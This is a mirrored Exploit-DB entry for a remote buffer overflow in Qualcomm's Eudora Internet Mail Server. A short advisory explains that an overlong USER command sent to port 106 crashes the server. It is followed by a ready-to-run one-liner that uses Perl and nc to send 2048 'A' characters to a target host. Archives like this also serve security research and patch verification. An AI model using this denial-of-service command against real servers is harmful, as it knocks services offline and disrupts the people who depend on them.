exploit-db-mirror/exploits/linux/remote/19069.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

5 lines
No EOL
387 B
Text

source: https://www.securityfocus.com/bid/75/info
There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.
$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106